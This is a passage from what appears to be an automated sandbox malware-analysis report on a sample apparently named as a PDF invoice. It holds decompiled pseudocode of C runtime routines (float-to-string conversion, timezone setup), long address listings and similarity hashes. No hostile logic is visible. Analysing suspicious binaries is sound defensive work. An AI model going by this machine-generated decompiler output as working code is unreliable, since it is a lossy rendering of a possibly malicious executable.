                            															goto L179;
                            														}
                            													}
                            												} else {
                            													_t1221 = _v1396;
                            													__eflags = _t1221;
                            													if(_t1221 != 0) {
                            														__eflags = _t1221 - 1;
                            														if(_t1221 == 1) {
                            															goto L180;
                            														} else {
                            															__eflags = _v936;
                            															if(_v936 == 0) {
                            																goto L180;
                            															} else {
                            																_t1112 = 0;
                            																_v1884 = _v936;
                            																_t1263 = 0;
                            																__eflags = 0;
                            																do {
                            																	_t962 = _t1221;
                            																	_t1172 = _t962 *  *(_t1276 + _t1263 * 4 - 0x3a0) >> 0x20;
                            																	 *(_t1276 + _t1263 * 4 - 0x3a0) = _t962 *  *(_t1276 + _t1263 * 4 - 0x3a0) + _t1112;
                            																	asm("adc edx, 0x0");
                            																	_t1263 = _t1263 + 1;
                            																	_t1112 = _t1172;
                            																	__eflags = _t1263 - _v1884;
                            																} while (_t1263 != _v1884);
                            																L149:
                            																__eflags = _t1111;
                            																if(_t1111 == 0) {
                            																	goto L180;
                            																} else {
                            																	_t958 = _v936;
                            																	__eflags = _t958 - 0x73;
                            																	if(_t958 < 0x73) {
                            																		 *(_t1276 + _t958 * 4 - 0x3a0) = _t1111;
                            																		_v936 = _v936 + 1;
                            																		goto L180;
                            																	} else {
                            																		_v1400 = 0;
                            																		_v936 = 0;
                            																		_push(0);
                            																		_t937 =  &_v1396;
                            																		L188:
                            																		_push(_t937);
                            																		_push(_t1061);
                            																		_push( &_v932);
                            																		E01319BDB();
                            																		_t1282 =  &(_t1282[4]);
                            																		_t930 = 0;
                            																	}
                            																}
                            															}
                            														}
                            													} else {
                            														_t926 = 0;
                            														_v1864 = 0;
                            														_v936 = 0;
                            														L178:
                            														_push(_t926);
                            														_t927 =  &_v1860;
                            														L179:
                            														_push(_t927);
                            														_push(_t1061);
                            														_push( &_v932);
                            														E01319BDB();
                            														_t1282 =  &(_t1282[4]);
                            														L180:
                            														_t930 = 1;
                            													}
                            												}
                            												L181:
                            												__eflags = _t930;
                            												if(_t930 == 0) {
                            													_v2408 = _v2408 & 0x00000000;
                            													_t404 =  &_v936;
                            													 *_t404 = _v936 & 0x00000000;
                            													__eflags =  *_t404;
                            													_push(0);
                            													L190:
                            													_push( &_v2404);
                            													_t849 =  &_v932;
                            													L262:
                            													_push(_t1061);
                            													_push(_t849);
                            													E01319BDB();
                            													_t1282 =  &(_t1282[4]);
                            												} else {
                            													goto L182;
                            												}
                            												goto L263;
                            												L182:
                            												_t905 = _v1908 - _v1888;
                            												__eflags = _t905;
                            												_v1908 = _t905;
                            											} while (_t905 != 0);
                            											_t1106 = _v1896;
                            											goto L184;
                            										}
                            									}
                            									L263:
                            									_t1201 = _v1920;
                            									_t1249 = _t1201;
                            									_t1090 = _v472;
                            									_v1872 = _t1249;
                            									__eflags = _t1090;
                            									if(_t1090 != 0) {
                            										_t1253 = 0;
                            										_t1205 = 0;
                            										__eflags = 0;
                            										do {
                            											_t838 =  *(_t1276 + _t1205 * 4 - 0x1d0);
                            											_t1158 = 0xa;
                            											_t1159 = _t838 * _t1158 >> 0x20;
                            											 *(_t1276 + _t1205 * 4 - 0x1d0) = _t838 * _t1158 + _t1253;
                            											asm("adc edx, 0x0");
                            											_t1205 = _t1205 + 1;
                            											_t1253 = _t1159;
                            											__eflags = _t1205 - _t1090;
                            										} while (_t1205 != _t1090);
                            										_v1896 = _t1253;
                            										__eflags = _t1253;
                            										_t1249 = _v1872;
                            										if(_t1253 != 0) {
                            											_t1099 = _v472;
                            											__eflags = _t1099 - 0x73;
                            											if(_t1099 >= 0x73) {
                            												__eflags = 0;
                            												_v2408 = 0;
                            												_v472 = 0;
                            												E01319BDB( &_v468, _t1061,  &_v2404, 0);
                            												_t1282 =  &(_t1282[4]);
                            											} else {
                            												 *(_t1276 + _t1099 * 4 - 0x1d0) = _t1159;
                            												_v472 = _v472 + 1;
                            											}
                            										}
                            										_t1201 = _t1249;
                            									}
                            									_t812 = E013292A0( &_v472,  &_v936);
                            									_t1151 = 0xa;
                            									__eflags = _t812 - _t1151;
                            									if(_t812 != _t1151) {
                            										__eflags = _t812;
                            										if(_t812 != 0) {
                            											_t813 = _t812 + 0x30;
                            											__eflags = _t813;
                            											_t1249 = _t1201 + 1;
                            											 *_t1201 = _t813;
                            											_v1872 = _t1249;
                            											goto L282;
                            										} else {
                            											_t814 = _v1904 - 1;
                            										}
                            									} else {
                            										_v1904 = _v1904 + 1;
                            										_t1249 = _t1201 + 1;
                            										_t829 = _v936;
                            										 *_t1201 = 0x31;
                            										_v1872 = _t1249;
                            										__eflags = _t829;
                            										if(_t829 != 0) {
                            											_t1204 = 0;
                            											_t1252 = _t829;
                            											_t1098 = 0;
                            											__eflags = 0;
                            											do {
                            												_t830 =  *(_t1276 + _t1098 * 4 - 0x3a0);
                            												 *(_t1276 + _t1098 * 4 - 0x3a0) = _t830 * _t1151 + _t1204;
                            												asm("adc edx, 0x0");
                            												_t1098 = _t1098 + 1;
                            												_t1204 = _t830 * _t1151 >> 0x20;
                            												_t1151 = 0xa;
                            												__eflags = _t1098 - _t1252;
                            											} while (_t1098 != _t1252);
                            											_t1249 = _v1872;
                            											__eflags = _t1204;
                            											if(_t1204 != 0) {
                            												_t833 = _v936;
                            												__eflags = _t833 - 0x73;
                            												if(_t833 >= 0x73) {
                            													_v2408 = 0;
                            													_v936 = 0;
                            													E01319BDB( &_v932, _t1061,  &_v2404, 0);
                            													_t1282 =  &(_t1282[4]);
                            												} else {
                            													 *(_t1276 + _t833 * 4 - 0x3a0) = _t1204;
                            													_v936 = _v936 + 1;
                            												}
                            											}
                            										}
                            										L282:
                            										_t814 = _v1904;
                            									}
                            									 *((intOrPtr*)(_v1924 + 4)) = _t814;
                            									_t1067 = _v1916;
                            									__eflags = _t814;
                            									if(_t814 >= 0) {
                            										__eflags = _t1067 - 0x7fffffff;
                            										if(_t1067 <= 0x7fffffff) {
                            											_t1067 = _t1067 + _t814;
                            											__eflags = _t1067;
                            										}
                            									}
                            									_t816 = _a24 - 1;
                            									__eflags = _t816 - _t1067;
                            									if(_t816 >= _t1067) {
                            										_t816 = _t1067;
                            									}
                            									_t757 = _t816 + _v1920;
                            									_v1916 = _t757;
                            									__eflags = _t1249 - _t757;
                            									if(__eflags != 0) {
                            										while(1) {
                            											_t757 = _v472;
                            											__eflags = _t757;
                            											if(__eflags == 0) {
                            												goto L303;
                            											}
                            											_t1202 = 0;
                            											_t1250 = _t757;
                            											_t1094 = 0;
                            											__eflags = 0;
                            											do {
                            												_t817 =  *(_t1276 + _t1094 * 4 - 0x1d0);
                            												 *(_t1276 + _t1094 * 4 - 0x1d0) = _t817 * 0x3b9aca00 + _t1202;
                            												asm("adc edx, 0x0");
                            												_t1094 = _t1094 + 1;
                            												_t1202 = _t817 * 0x3b9aca00 >> 0x20;
                            												__eflags = _t1094 - _t1250;
                            											} while (_t1094 != _t1250);
                            											_t1251 = _v1872;
                            											__eflags = _t1202;
                            											if(_t1202 != 0) {
                            												_t823 = _v472;
                            												__eflags = _t823 - 0x73;
                            												if(_t823 >= 0x73) {
                            													__eflags = 0;
                            													_v2408 = 0;
                            													_v472 = 0;
                            													E01319BDB( &_v468, _t1061,  &_v2404, 0);
                            													_t1282 =  &(_t1282[4]);
                            												} else {
                            													 *(_t1276 + _t823 * 4 - 0x1d0) = _t1202;
                            													_v472 = _v472 + 1;
                            												}
                            											}
                            											_t822 = E013292A0( &_v472,  &_v936);
                            											_t1203 = 8;
                            											_t1067 = _v1916 - _t1251;
                            											__eflags = _t1067;
                            											do {
                            												_t708 = _t822 % _v1912;
                            												_t822 = _t822 / _v1912;
                            												_t1156 = _t708 + 0x30;
                            												__eflags = _t1067 - _t1203;
                            												if(_t1067 >= _t1203) {
                            													 *((char*)(_t1203 + _t1251)) = _t1156;
                            												}
                            												_t1203 = _t1203 - 1;
                            												__eflags = _t1203 - 0xffffffff;
                            											} while (_t1203 != 0xffffffff);
                            											__eflags = _t1067 - 9;
                            											if(_t1067 > 9) {
                            												_t1067 = 9;
                            											}
                            											_t1249 = _t1251 + _t1067;
                            											_v1872 = _t1249;
                            											__eflags = _t1249 - _v1916;
                            											if(__eflags != 0) {
                            												continue;
                            											}
                            											goto L303;
                            										}
                            									}
                            									L303:
                            									 *_t1249 = 0;
                            									goto L309;
                            								}
                            							}
                            						}
                            					}
                            				} else {
                            					_t1067 = _t1241 & 0x000fffff;
                            					if((_t1193 | _t1241 & 0x000fffff) != 0) {
                            						goto L5;
                            					} else {
                            						_push(0x13393ec);
                            						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
                            						L308:
                            						_push(_a24);
                            						_push(_t1052);
                            						_t757 = E01320A73();
                            						if(_t757 != 0) {
                            							_push(0);
                            							_push(0);
                            							_push(0);
                            							_push(0);
                            							_push(0);
                            							E01321798();
                            							asm("int3");
                            							_push(_t1276);
                            							_t760 = 0xffff;
                            							__eflags = _v2436 - 0xffff;
                            							if(_v2436 != 0xffff) {
                            								E0131AFAE(_t1052,  &_v32, _t1146, _a4);
                            								_t763 =  *(_v28 + 0xa8);
                            								__eflags = _t763;
                            								if(_t763 != 0) {
                            									_push(1);
                            									__eflags = _v0 - 0x100;
                            									if(_v0 >= 0x100) {
                            										_push( &_v12);
                            										_push(1);
                            										_push( &_v0);
                            										_push(0x100);
                            										_push(_t763);
                            										_t764 = E0132CDAD(_t1052,  &_v0);
                            										__eflags = _t764;
                            										if(_t764 != 0) {
                            											_t760 = _v12;
                            										} else {
                            											_t765 = _v0;
                            											goto L326;
                            										}
                            									} else {
                            										_push(_v0);
                            										_t766 = E01328C40( &_v32);
                            										__eflags = _t766;
                            										if(_t766 != 0) {
                            											_t769 =  *( *((intOrPtr*)(_v28 + 0x94)) + (_v0 & 0x0000ffff)) & 0x000000ff;
                            										} else {
                            											_t770 = _v0;
                            											goto L321;
                            										}
                            										goto L323;
                            									}
                            								} else {
                            									_t1075 = _v0;
                            									__eflags = _t1075 - 0x41 - 0x19;
                            									if(_t1075 - 0x41 <= 0x19) {
                            										_t1076 = _t1075 + 0x20;
                            										__eflags = _t1076;
                            										_t772 = _t1076 & 0x0000ffff;
                            										_v16 = _t772;
                            										_t1075 = _t772;
                            									}
                            									_t770 = _t1075 & 0x0000ffff;
                            									_v16 = _t770;
                            									L321:
                            									_t769 = _t770 & 0x0000ffff;
                            									L323:
                            									_t765 = _t769 & 0x0000ffff;
                            									_v16 = _t765;
                            									L326:
                            									_t760 = _t765 & 0x0000ffff;
                            									_v16 = _t760;
                            								}
                            								__eflags = _v20;
                            								if(_v20 != 0) {
                            									_t1071 = _v32;
                            									_t743 = _t1071 + 0x350;
                            									 *_t743 =  *(_t1071 + 0x350) & 0xfffffffd;
                            									__eflags =  *_t743;
                            									return _t760;
                            								}
                            							}
                            							return _t760;
                            						} else {
                            							L309:
                            							_t1289 = _v1936;
                            							if(_v1936 != 0) {
                            								_t757 = E0132CA9C(_t1067, _t1289,  &_v1944);
                            							}
                            							E0131786A();
                            							return _t757;
                            						}
                            					}
                            				}
                            			}
                            0x01329a99
                            0x01329a9b
                            0x01329aa1
                            0x01329aa7
                            0x01329abc
                            0x01329ac1
                            0x013299aa
                            0x013299aa
                            0x013299ac
                            0x00000000
                            0x013299b2
                            0x013299b4
                            0x013299b5
                            0x013299b7
                            0x013299b9
                            0x013299bb
                            0x013299bb
                            0x013299c1
                            0x013299c3
                            0x013299c9
                            0x013299cc
                            0x013299da
                            0x013299e0
                            0x013299e0
                            0x013299e2
                            0x013299e5
                            0x013299eb
                            0x013299eb
                            0x013299ed
                            0x00000000
                            0x00000000
                            0x013299ef
                            0x013299f1
                            0x013299f7
                            0x013299f7
                            0x013299f3
                            0x013299f3
                            0x013299f3
                            0x013299fc
                            0x013299fe
                            0x01329a0b
                            0x01329a0b
                            0x01329a00
                            0x01329a06
                            0x01329a06
                            0x01329a29
                            0x01329a31
                            0x01329a38
                            0x01329a3f
                            0x01329a40
                            0x01329a43
                            0x01329a49
                            0x01329a4f
                            0x01329a52
                            0x01329a54
                            0x00000000
                            0x01329a54
                            0x00000000
                            0x01329a52
                            0x01329a5c
                            0x01329a62
                            0x01329a62
                            0x01329a68
                            0x01329a6a
                            0x01329a74
                            0x01329a76
                            0x01329a76
                            0x01329a76
                            0x01329a78
                            0x01329a7f
                            0x01329a84
                            0x01329a91
                            0x01329a86
                            0x01329a89
                            0x01329a89
                            0x01329a84
                            0x013299ac
                            0x01329ac4
                            0x01329acf
                            0x01329ad0
                            0x01329ad1
                            0x01329ad7
                            0x01329add
                            0x01329ae3
                            0x01329ae3
                            0x00000000
                            0x0132991c
                            0x00000000
                            0x01329902
                            0x01329ae4
                            0x01329aea
                            0x01329af1
                            0x01329af2
                            0x01329af3
                            0x01329af8
                            0x01329af8
                            0x01329f5c
                            0x01329f66
                            0x01329f67
                            0x01329f6d
                            0x01329f6f
                            0x0132a3d8
                            0x0132a3da
                            0x0132a3dc
                            0x0132a3e2
                            0x0132a3e4
                            0x0132a3ea
                            0x0132a3ec
                            0x0132a73e
                            0x0132a73e
                            0x0132a740
                            0x0132a746
                            0x0132a74d
                            0x0132a753
                            0x0132a755
                            0x0132a7f3
                            0x0132a7f3
                            0x0132a7f5
                            0x0132a7f6
                            0x0132a7fc
                            0x00000000
                            0x0132a75b
                            0x0132a75b
                            0x0132a75e
                            0x0132a764
                            0x0132a76a
                            0x0132a76c
                            0x0132a772
                            0x0132a774
                            0x0132a774
                            0x0132a776
                            0x0132a776
                            0x0132a77f
                            0x0132a786
                            0x0132a78c
                            0x0132a78f
                            0x0132a790
                            0x0132a792
                            0x0132a792
                            0x0132a796
                            0x0132a798
                            0x0132a79a
                            0x0132a7a0
                            0x0132a7a3
                            0x00000000
                            0x0132a7a5
                            0x0132a7a5
                            0x0132a7ac
                            0x0132a7ac
                            0x0132a7a3
                            0x0132a798
                            0x0132a76c
                            0x0132a75e
                            0x0132a755
                            0x0132a3f2
                            0x0132a3f2
                            0x0132a3f2
                            0x0132a3f5
                            0x0132a3f9
                            0x0132a3f9
                            0x0132a3fa
                            0x0132a40c
                            0x0132a419
                            0x0132a428
                            0x0132a452
                            0x0132a457
                            0x0132a45d
                            0x0132a460
                            0x0132a466
                            0x0132a469
                            0x0132a502
                            0x0132a509
                            0x0132a587
                            0x0132a58d
                            0x0132a593
                            0x0132a596
                            0x0132a598
                            0x0132a621
                            0x0132a59e
                            0x0132a59e
                            0x0132a5a4
                            0x0132a5a4
                            0x0132a5aa
                            0x0132a5b0
                            0x0132a5b2
                            0x0132a5b4
                            0x0132a5b4
                            0x0132a5ba
                            0x0132a5c0
                            0x0132a5c2
                            0x0132a5ca
                            0x0132a5ca
                            0x0132a5d0
                            0x0132a5d2
                            0x0132a5d4
                            0x0132a5da
                            0x0132a5dc
                            0x0132a6f3
                            0x0132a6f5
                            0x0132a6fb
                            0x0132a6fb
                            0x0132a6fe
                            0x0132a6ff
                            0x00000000
                            0x0132a5e2
                            0x0132a5e8
                            0x0132a5e8
                            0x0132a5ea
                            0x0132a5f0
                            0x0132a5f3
                            0x0132a5fa
                            0x0132a600
                            0x0132a602
                            0x0132a629
                            0x0132a62b
                            0x0132a62d
                            0x0132a62f
                            0x0132a635
                            0x0132a63b
                            0x0132a6d5
                            0x0132a6d5
                            0x0132a6d8
                            0x00000000
                            0x0132a6de
                            0x0132a6de
                            0x0132a6e4
                            0x00000000
                            0x0132a6e4
                            0x0132a641
                            0x0132a641
                            0x0132a641
                            0x0132a644
                            0x00000000
                            0x00000000
                            0x0132a646
                            0x0132a648
                            0x0132a64a
                            0x0132a653
                            0x0132a653
                            0x0132a655
                            0x0132a65b
                            0x0132a65b
                            0x0132a667
                            0x0132a672
                            0x0132a675
                            0x0132a682
                            0x0132a685
                            0x0132a686
                            0x0132a687
                            0x0132a68d
                            0x0132a68f
                            0x0132a695
                            0x0132a69b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132a69d
                            0x0132a69d
                            0x0132a69d
                            0x0132a69f
                            0x00000000
                            0x00000000
                            0x0132a6a1
                            0x0132a6a4
                            0x00000000
                            0x0132a6aa
                            0x0132a6aa
                            0x0132a6ac
                            0x0132a6ae
                            0x0132a6ae
                            0x0132a6ae
                            0x0132a6b6
                            0x0132a6b9
                            0x0132a6b9
                            0x0132a6bf
                            0x0132a6c1
                            0x0132a6c3
                            0x0132a6ca
                            0x0132a6d0
                            0x0132a6d2
                            0x00000000
                            0x0132a6d2
                            0x00000000
                            0x0132a6a4
                            0x00000000
                            0x0132a69d
                            0x00000000
                            0x0132a641
                            0x0132a604
                            0x0132a604
                            0x0132a606
                            0x0132a60c
                            0x0132a613
                            0x0132a613
                            0x0132a616
                            0x0132a616
                            0x00000000
                            0x0132a606
                            0x00000000
                            0x0132a6ea
                            0x0132a6ea
                            0x0132a6eb
                            0x0132a6eb
                            0x00000000
                            0x0132a5f0
                            0x0132a50b
                            0x0132a50b
                            0x0132a51d
                            0x0132a52c
                            0x0132a531
                            0x0132a534
                            0x0132a536
                            0x00000000
                            0x0132a53c
                            0x0132a53c
                            0x0132a53f
                            0x00000000
                            0x0132a545
                            0x0132a545
                            0x0132a54c
                            0x00000000
                            0x0132a552
                            0x0132a558
                            0x0132a55a
                            0x0132a560
                            0x0132a560
                            0x0132a562
                            0x0132a562
                            0x0132a564
                            0x0132a56d
                            0x0132a574
                            0x0132a577
                            0x0132a578
                            0x0132a57a
                            0x0132a57a
                            0x00000000
                            0x0132a582
                            0x0132a54c
                            0x0132a53f
                            0x0132a536
                            0x0132a46f
                            0x0132a46f
                            0x0132a475
                            0x0132a477
                            0x0132a493
                            0x0132a496
                            0x00000000
                            0x0132a49c
                            0x0132a49c
                            0x0132a4a3
                            0x00000000
                            0x0132a4a9
                            0x0132a4af
                            0x0132a4b1
                            0x0132a4b7
                            0x0132a4b7
                            0x0132a4b9
                            0x0132a4b9
                            0x0132a4bb
                            0x0132a4c4
                            0x0132a4cb
                            0x0132a4ce
                            0x0132a4cf
                            0x0132a4d1
                            0x0132a4d1
                            0x0132a4d9
                            0x0132a4d9
                            0x0132a4db
                            0x00000000
                            0x0132a4e1
                            0x0132a4e1
                            0x0132a4e7
                            0x0132a4ea
                            0x0132a7b4
                            0x0132a7b7
                            0x0132a7bd
                            0x0132a7d2
                            0x0132a7d7
                            0x0132a7da
                            0x0132a4f0
                            0x0132a4f0
                            0x0132a4f7
                            0x00000000
                            0x0132a4f7
                            0x0132a4ea
                            0x0132a4db
                            0x0132a4a3
                            0x0132a479
                            0x0132a479
                            0x0132a47b
                            0x0132a481
                            0x0132a487
                            0x0132a488
                            0x0132a705
                            0x0132a705
                            0x0132a70c
                            0x0132a70d
                            0x0132a70e
                            0x0132a713
                            0x0132a716
                            0x0132a716
                            0x0132a716
                            0x0132a477
                            0x0132a718
                            0x0132a718
                            0x0132a71a
                            0x0132a7e1
                            0x0132a7e8
                            0x0132a7ef
                            0x0132a802
                            0x0132a808
                            0x0132a809
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132a720
                            0x0132a726
                            0x0132a726
                            0x0132a72c
                            0x0132a72c
                            0x0132a738
                            0x00000000
                            0x0132a738
                            0x01329f75
                            0x01329f75
                            0x01329f77
                            0x01329f7d
                            0x01329f7f
                            0x01329f85
                            0x01329f87
                            0x0132a2fe
                            0x0132a2fe
                            0x0132a300
                            0x0132a306
                            0x0132a30d
                            0x0132a30f
                            0x0132a36e
                            0x0132a371
                            0x0132a377
                            0x0132a37d
                            0x0132a383
                            0x0132a385
                            0x0132a38b
                            0x0132a38d
                            0x0132a38d
                            0x0132a38f
                            0x0132a38f
                            0x0132a391
                            0x0132a39a
                            0x0132a3a1
                            0x0132a3a4
                            0x0132a3a5
                            0x0132a3a7
                            0x0132a3a7
                            0x0132a3af
                            0x0132a3b1
                            0x0132a3b7
                            0x0132a3bd
                            0x0132a3c0
                            0x00000000
                            0x0132a3c6
                            0x0132a3c6
                            0x0132a3cd
                            0x0132a3cd
                            0x0132a3c0
                            0x0132a3b1
                            0x0132a385
                            0x0132a311
                            0x0132a311
                            0x0132a313
                            0x0132a319
                            0x0132a31f
                            0x00000000
                            0x0132a31f
                            0x0132a30f
                            0x01329f8d
                            0x01329f8d
                            0x01329f8d
                            0x01329f90
                            0x01329f94
                            0x01329f94
                            0x01329f95
                            0x01329fa7
                            0x01329fb4
                            0x01329fc3
                            0x01329fed
                            0x01329ff2
                            0x01329ff8
                            0x01329ffb
                            0x0132a001
                            0x0132a004
                            0x0132a080
                            0x0132a087
                            0x0132a14b
                            0x0132a151
                            0x0132a157
                            0x0132a15a
                            0x0132a15c
                            0x0132a1e5
                            0x0132a162
                            0x0132a162
                            0x0132a168
                            0x0132a168
                            0x0132a16e
                            0x0132a174
                            0x0132a176
                            0x0132a178
                            0x0132a178
                            0x0132a17e
                            0x0132a184
                            0x0132a186
                            0x0132a18e
                            0x0132a18e
                            0x0132a194
                            0x0132a196
                            0x0132a198
                            0x0132a19e
                            0x0132a1a0
                            0x0132a2b7
                            0x0132a2b9
                            0x0132a2bf
                            0x0132a2bf
                            0x00000000
                            0x0132a1a6
                            0x0132a1ac
                            0x0132a1ac
                            0x0132a1ae
                            0x0132a1b4
                            0x0132a1b7
                            0x0132a1be
                            0x0132a1c4
                            0x0132a1c6
                            0x0132a1ed
                            0x0132a1ef
                            0x0132a1f1
                            0x0132a1f3
                            0x0132a1f9
                            0x0132a1ff
                            0x0132a299
                            0x0132a299
                            0x0132a29c
                            0x00000000
                            0x0132a2a2
                            0x0132a2a2
                            0x0132a2a8
                            0x00000000
                            0x0132a2a8
                            0x0132a205
                            0x0132a205
                            0x0132a205
                            0x0132a208
                            0x00000000
                            0x00000000
                            0x0132a20a
                            0x0132a20c
                            0x0132a20e
                            0x0132a217
                            0x0132a217
                            0x0132a219
                            0x0132a21f
                            0x0132a21f
                            0x0132a22b
                            0x0132a236
                            0x0132a239
                            0x0132a246
                            0x0132a249
                            0x0132a24a
                            0x0132a24b
                            0x0132a251
                            0x0132a253
                            0x0132a259
                            0x0132a25f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132a261
                            0x0132a261
                            0x0132a261
                            0x0132a263
                            0x00000000
                            0x00000000
                            0x0132a265
                            0x0132a268
                            0x0132a322
                            0x0132a322
                            0x0132a324
                            0x0132a32a
                            0x0132a330
                            0x0132a331
                            0x00000000
                            0x0132a26e
                            0x0132a26e
                            0x0132a270
                            0x0132a272
                            0x0132a272
                            0x0132a272
                            0x0132a27a
                            0x0132a27d
                            0x0132a27d
                            0x0132a283
                            0x0132a285
                            0x0132a287
                            0x0132a28e
                            0x0132a294
                            0x0132a296
                            0x00000000
                            0x0132a296
                            0x00000000
                            0x0132a268
                            0x00000000
                            0x0132a261
                            0x00000000
                            0x0132a205
                            0x0132a1c8
                            0x0132a1c8
                            0x0132a1ca
                            0x0132a1d0
                            0x0132a1d7
                            0x0132a1d7
                            0x0132a1da
                            0x0132a1da
                            0x00000000
                            0x0132a1ca
                            0x00000000
                            0x0132a2ae
                            0x0132a2ae
                            0x0132a2af
                            0x0132a2af
                            0x00000000
                            0x0132a1b4
                            0x0132a08d
                            0x0132a08d
                            0x0132a09f
                            0x0132a0ae
                            0x0132a0b3
                            0x0132a0b6
                            0x0132a0b8
                            0x0132a0d4
                            0x0132a0d7
                            0x00000000
                            0x0132a0dd
                            0x0132a0dd
                            0x0132a0e4
                            0x00000000
                            0x0132a0ea
                            0x0132a0f0
                            0x0132a0f2
                            0x0132a0f8
                            0x0132a0f8
                            0x0132a0fa
                            0x0132a0fa
                            0x0132a0fc
                            0x0132a105
                            0x0132a10c
                            0x0132a10f
                            0x0132a110
                            0x0132a112
                            0x0132a112
                            0x00000000
                            0x0132a0fa
                            0x0132a0e4
                            0x0132a0ba
                            0x0132a0bc
                            0x0132a0c2
                            0x0132a0c8
                            0x0132a0c9
                            0x00000000
                            0x0132a0c9
                            0x0132a0b8
                            0x0132a006
                            0x0132a006
                            0x0132a00c
                            0x0132a00e
                            0x0132a023
                            0x0132a026
                            0x00000000
                            0x0132a02c
                            0x0132a02c
                            0x0132a033
                            0x00000000
                            0x0132a039
                            0x0132a03f
                            0x0132a041
                            0x0132a047
                            0x0132a047
                            0x0132a049
                            0x0132a049
                            0x0132a04b
                            0x0132a054
                            0x0132a05b
                            0x0132a05e
                            0x0132a05f
                            0x0132a061
                            0x0132a061
                            0x0132a11a
                            0x0132a11a
                            0x0132a11c
                            0x00000000
                            0x0132a122
                            0x0132a122
                            0x0132a128
                            0x0132a12b
                            0x0132a06e
                            0x0132a075
                            0x00000000
                            0x0132a131
                            0x0132a133
                            0x0132a139
                            0x0132a13f
                            0x0132a140
                            0x0132a337
                            0x0132a337
                            0x0132a33e

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __floor_pentium4
                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                            • API String ID: 4168288129-2761157908
                            • Opcode ID: 430feac0b82200b05c329cd501f11170ec69275d4b741306eebb359193701bd0
                            • Instruction ID: 0b31a08c777df1005a9dabd6aa5c6c679d686dc831c2596e0640161e21db8c09
                            • Opcode Fuzzy Hash: 430feac0b82200b05c329cd501f11170ec69275d4b741306eebb359193701bd0
                            • Instruction Fuzzy Hash: B1C26B71E086398FDB25DE28DD407EAB7B9EB88318F1441EAD44DE7641E774AE818F40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E0132B193(void* __eflags) {
                            				int _v8;
                            				int _v12;
                            				int _v16;
                            				int _v20;
                            				signed int _v56;
                            				char _v268;
                            				intOrPtr _v272;
                            				char _v276;
                            				char _v312;
                            				char _v316;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				void* _t36;
                            				signed int _t38;
                            				signed int _t42;
                            				void* _t45;
                            				signed int _t49;
                            				void* _t53;
                            				void* _t55;
                            				signed int* _t60;
                            				intOrPtr _t70;
                            				void* _t79;
                            				signed int _t86;
                            				void* _t88;
                            				signed int _t89;
                            				signed int _t91;
                            				int _t95;
                            				void* _t97;
                            				char** _t98;
                            				signed int _t102;
                            				signed int _t104;
                            				signed int _t110;
                            				signed int _t111;
                            				intOrPtr _t120;
                            				intOrPtr _t122;
                            
                            				_t98 = E0132ABFC();
                            				_v8 = 0;
                            				_v12 = 0;
                            				_v16 = 0;
                            				_t36 = E0132AC5A( &_v8);
                            				_t79 = _t97;
                            				if(_t36 != 0) {
                            					L19:
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					E01321798();
                            					asm("int3");
                            					_t110 = _t111;
                            					_t38 =  *0x133c008; // 0xa3433343
                            					_v56 = _t38 ^ _t110;
                            					 *0x133c91c =  *0x133c91c | 0xffffffff;
                            					 *0x133c910 =  *0x133c910 | 0xffffffff;
                            					_push(0);
                            					_push(_t98);
                            					_t76 = "TZ";
                            					_t91 = 0;
                            					 *0x1346578 = 0;
                            					_t42 = E01326CC0("TZ", _t88, 0, _t98, __eflags,  &_v316,  &_v312, 0x100, "TZ");
                            					__eflags = _t42;
                            					if(_t42 != 0) {
                            						__eflags = _t42 - 0x22;
                            						if(_t42 == 0x22) {
                            							_t104 = E01320A25(_t79, _v272);
                            							__eflags = _t104;
                            							if(__eflags != 0) {
                            								_t49 = E01326CC0(_t76, _t88, 0, _t104, __eflags,  &_v276, _t104, _v272, _t76);
                            								__eflags = _t49;
                            								if(_t49 == 0) {
                            									E013209EB(0);
                            									_t91 = _t104;
                            								} else {
                            									_push(_t104);
                            									goto L25;
                            								}
                            							} else {
                            								_push(0);
                            								L25:
                            								E013209EB();
                            							}
                            						}
                            					} else {
                            						_t91 =  &_v268;
                            					}
                            					asm("sbb esi, esi");
                            					_t102 =  ~(_t91 -  &_v268) & _t91;
                            					__eflags = _t91;
                            					if(__eflags == 0) {
                            						L33:
                            						E0132B193(__eflags);
                            					} else {
                            						__eflags =  *_t91;
                            						if(__eflags == 0) {
                            							goto L33;
                            						} else {
                            							_push(_t91);
                            							E0132AFBE(__eflags);
                            						}
                            					}
                            					_t45 = E013209EB(_t102);
                            					__eflags = _v12 ^ _t110;
                            					E0131786A();
                            					return _t45;
                            				} else {
                            					_t53 = E0132AC02( &_v12);
                            					_pop(_t79);
                            					if(_t53 != 0) {
                            						goto L19;
                            					} else {
                            						_t55 = E0132AC2E( &_v16);
                            						_pop(_t79);
                            						if(_t55 != 0) {
                            							goto L19;
                            						} else {
                            							E013209EB( *0x1346574);
                            							 *0x1346574 = 0;
                            							 *_t111 = 0x1346580;
                            							if(GetTimeZoneInformation(??) != 0xffffffff) {
                            								_t86 =  *0x1346580 * 0x3c;
                            								_t89 =  *0x13465d4; // 0x0
                            								_push(_t90);
                            								 *0x1346578 = 1;
                            								_v8 = _t86;
                            								_t120 =  *0x13465c6; // 0x0
                            								if(_t120 != 0) {
                            									_v8 = _t86 + _t89 * 0x3c;
                            								}
                            								_t122 =  *0x134661a; // 0x0
                            								if(_t122 == 0) {
                            									L9:
                            									_v12 = 0;
